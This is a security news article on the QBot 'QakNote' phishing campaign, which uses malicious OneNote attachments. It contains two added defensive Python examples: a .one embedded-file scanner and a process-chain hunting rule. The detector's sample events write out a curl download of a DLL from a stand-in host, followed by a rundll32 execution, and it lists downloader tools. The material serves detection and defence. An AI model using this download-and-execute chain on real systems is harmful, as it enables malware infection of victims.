A new QBot malware campaign dubbed “QakNote” has been observed in the wild since last week, using malicious Microsoft OneNote ‘.one’ attachments to infect systems with the banking Trojan.

Qbot (a.k.a. QakBot) is a former banking Trojan that evolved into initial-access malware, allowing threat actors to load additional payloads onto compromised machines and carry out data theft, ransomware deployment, or other network-wide activity.

OneNote attachments in phishing emails appeared last month as a new attack vector to replace malicious macros in Office documents that Microsoft disabled in July 2022, leaving threat actors with fewer options to execute code on targets’ devices.

Threat actors can embed almost any file type in a malicious OneNote notebook, including VBS scripts, HTA files, or LNK shortcuts. The embedded file is executed when a user double-clicks it inside the notebook.

However, some social engineering is needed to convince the user to click the right spot to launch the embedded attachment, usually a “Double-click to view file” button or a similar call to action, as shown below.

Example of malicious Microsoft OneNote attachment
Source: BleepingComputer

Once launched, embedded attachments can execute commands on the local machine to download and install malware.
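Because the lure depends on a file embedded in the notebook, a mail gateway or IR analyst can triage a .one attachment without opening it by carving out its embedded files. The following is an added example, not code from the article or from Sophos: it scans a notebook for FileDataStoreObject records (the header and footer GUIDs are assumed from Microsoft's MS-ONESTORE specification, the record layout being guidHeader, cbLength, unused, reserved, FileData, guidFooter), guesses each payload's type from its leading bytes, and returns a block/allow verdict. The sample notebook bytes are constructed inline and contain a harmless image and a dummy HTA, not a real malware sample.

```python
import struct
import uuid

# FileDataStoreObject GUIDs, assumed from MS-ONESTORE (not from the article).
# They are stored little-endian in the file, hence bytes_le.
FDSO_HEADER = uuid.UUID("bde316e7-2665-4511-a4c4-8d4d0b7a9eac").bytes_le
FDSO_FOOTER = uuid.UUID("71fba722-0f79-4a0b-bb13-899256426b24").bytes_le
FDSO_PREFIX_LEN = 16 + 8 + 4 + 8   # guidHeader, cbLength, unused, reserved

# Shell link header: HeaderSize 0x4C followed by the LNK CLSID.
LNK_MAGIC = b"L\x00\x00\x00" + uuid.UUID("00021401-0000-0000-c000-000000000046").bytes_le

RISKY_KINDS = {"pe", "lnk", "hta/html", "vbs"}


def classify(payload: bytes) -> str:
    """Best-effort type guess for an embedded file from magic bytes / content."""
    if payload.startswith(b"MZ"):
        return "pe"
    if payload.startswith(LNK_MAGIC):
        return "lnk"
    head = payload[:4096].lower()
    if b"<hta:application" in head or b"<script" in head:
        return "hta/html"
    if b"wscript" in head or b"createobject(" in head:
        return "vbs"
    if payload.startswith(b"\x89PNG") or payload.startswith(b"\xff\xd8"):
        return "image"
    return "unknown"


def extract_embedded(one_bytes: bytes) -> list:
    """Carve every FileDataStoreObject out of a .one blob."""
    objs = []
    pos = 0
    while (i := one_bytes.find(FDSO_HEADER, pos)) != -1:
        (cb_length,) = struct.unpack_from("<Q", one_bytes, i + 16)
        start = i + FDSO_PREFIX_LEN
        end = start + cb_length
        if end > len(one_bytes):
            pos = i + 16            # truncated/corrupt record: keep scanning
            continue
        payload = one_bytes[start:end]
        objs.append({
            "offset": start,
            "size": cb_length,
            "kind": classify(payload),
            "footer_ok": one_bytes[end:end + 16] == FDSO_FOOTER,
        })
        pos = end
    return objs


def triage(one_bytes: bytes) -> dict:
    """Gateway-style verdict: block if any embedded file is executable content."""
    objs = extract_embedded(one_bytes)
    risky = [o for o in objs if o["kind"] in RISKY_KINDS]
    return {"embedded": len(objs), "risky": len(risky),
            "verdict": "block" if risky else "allow"}


# --- constructed sample notebook (filler bytes plus two embedded files) ---
def _fdso(payload: bytes) -> bytes:
    return (FDSO_HEADER + struct.pack("<Q", len(payload)) + b"\0" * 12
            + payload + FDSO_FOOTER)


SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\0" * 32
SAMPLE_HTA = b"<html><hta:application id=x><script>/* lure */</script></html>"
SAMPLE_ONE = b"\0" * 64 + _fdso(SAMPLE_PNG) + b"\0" * 16 + _fdso(SAMPLE_HTA)

if __name__ == "__main__":
    for o in extract_embedded(SAMPLE_ONE):
        print(o)
    print(triage(SAMPLE_ONE))
```

The type guess is deliberately loose: an HTA is just text, so the scanner keys on `<hta:application` and `<script`, and anything it cannot classify is reported as `unknown` rather than silently allowed, which is the right failure mode for a gateway filter.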

The QakNote campaign

In a new report from Sophos, security researcher Andrew Brandt explains that QBot operators began experimenting with this distribution method on January 31, 2023, using OneNote files that contain an embedded HTML Application (.hta file) that retrieves the QBot payload.

This change in QBot’s tactics was first reported publicly by Cynet researcher Max Malyutin on Twitter on January 31, 2023.


A script in the HTA file uses the legitimate curl.exe utility to download a DLL (the QBot payload) into the C:\ProgramData folder, which is then executed with rundll32.exe.

Malicious HTA File Contents (Sophos)
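The execution chain described above (OneNote spawning mshta.exe, curl.exe dropping a DLL under C:\ProgramData, rundll32.exe loading it) is visible in ordinary process-creation telemetry, so it can be turned into a hunting rule. The following is an added example, not code from the article or from Sophos: it walks the parent chain of each event and raises alerts for an Office application spawning mshta.exe, a living-off-the-land downloader writing a DLL into ProgramData, and rundll32.exe loading a DLL from ProgramData, rated higher when its lineage includes the lure. The Sysmon-style events, paths, PIDs and the export name `Start` are constructed for the example and are not real telemetry.

```python
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


OFFICE_LURES = {"onenote.exe", "winword.exe", "excel.exe", "outlook.exe"}
LOLBIN_DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe"}
PROGRAMDATA_DLL = re.compile(r'c:\\programdata\\[^\s,"]+\.dll', re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(ev: Proc, by_pid: dict) -> list:
    """Parent chain of ev, oldest last; stops at unknown or cyclic PIDs."""
    chain, seen = [], set()
    p = by_pid.get(ev.ppid)
    while p is not None and p.pid not in seen:
        seen.add(p.pid)
        chain.append(p)
        p = by_pid.get(p.ppid)
    return chain


def detect(events: list) -> list:
    """Return (rule_name, pid) tuples for events matching the QakNote chain."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        name = basename(e.image)
        lineage = {basename(a.image) for a in ancestors(e, by_pid)}
        from_office = bool(OFFICE_LURES & lineage)

        if name == "mshta.exe" and from_office:
            alerts.append(("office_spawned_hta", e.pid))
        if name in LOLBIN_DOWNLOADERS and PROGRAMDATA_DLL.search(e.cmdline):
            alerts.append(("lolbin_writes_programdata_dll", e.pid))
        if name == "rundll32.exe" and PROGRAMDATA_DLL.search(e.cmdline):
            sev = "high" if (from_office or "mshta.exe" in lineage) else "medium"
            alerts.append((f"rundll32_programdata_dll_{sev}", e.pid))
    return alerts


# Constructed Sysmon-style process-creation events (not real telemetry).
EVENTS = [
    Proc(1000, 500, r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
         "ONENOTE.EXE /notes"),
    Proc(1100, 1000, r"C:\Windows\System32\mshta.exe",
         r'mshta.exe "C:\Users\u\AppData\Local\Temp\OneNote\16.0\Exported\NT\0\Open.hta"'),
    Proc(1200, 1100, r"C:\Windows\System32\curl.exe",
         r"curl.exe --output C:\ProgramData\update.dll https://example.invalid/x"),
    Proc(1300, 1100, r"C:\Windows\System32\rundll32.exe",
         r"rundll32.exe C:\ProgramData\update.dll,Start"),
    # Benign noise: a control-panel rundll32 call and a user download to a .txt file.
    Proc(2000, 500, r"C:\Windows\System32\rundll32.exe",
         "rundll32.exe shell32.dll,Control_RunDLL"),
    Proc(2100, 500, r"C:\Windows\System32\curl.exe",
         r"curl.exe https://example.invalid/ -o C:\Users\u\Downloads\a.txt"),
]

if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}")
```

The lineage walk matters more than any single indicator: rundll32.exe loading a DLL from ProgramData is noisy on its own, but the same event with mshta.exe and an Office process as ancestors is close to a certain hit, so the rule grades severity from the chain rather than from the command line alone.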

The QBot payload injects itself into the Windows Assistive Technology Manager (“AtBroker.exe”) to conceal its presence and evade detection by AV tools running on the device.

Sophos reports that QBot operators use two distribution methods for these weaponized notebooks: one sends emails carrying a link to the .one file, and the other uses a “thread injection” method.

The latter is a particularly tricky technique in which QBot operators hijack existing email threads and send a “reply to all” message to the participants with a malicious OneNote notebook file attached.

To make these attacks even more convincing, the threat actors place a fake button in the notebook that supposedly downloads the document from the cloud but, when clicked, executes the embedded attachment instead.

QBot malspam file reaching targets (Sophos)

Although this action triggers a warning dialog about the risks of running attachments, there is still a chance the victim will dismiss it.

To defend against this new attack vector, Sophos suggests that email administrators consider blocking the .one file extension outright, as OneNote notebooks are rarely sent as legitimate attachments.
